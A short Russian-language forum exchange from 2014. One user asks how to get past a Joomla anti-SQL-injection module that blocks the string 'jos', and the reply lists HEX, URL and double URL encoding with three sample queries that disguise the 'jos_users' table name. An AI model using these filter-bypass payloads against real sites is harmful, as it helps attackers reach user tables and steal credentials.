
15.11.2014, 19:43
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
часто бывает в джумле стоит какой-то модуль для защиты от sql инъекций. определил что реагирует на "jos". если оно встречается, то появляется:
пробовал шаманить - ничего не получилось. мб подскажет кто как можно обойти ?)
HEX, URL-encode, Double URL-encode
Смотря в каком месте
select * from %6aos_users
select * from %256aos_users
select * from information_schema.table where table_name=0x6a6f735f7573657273
|
|
|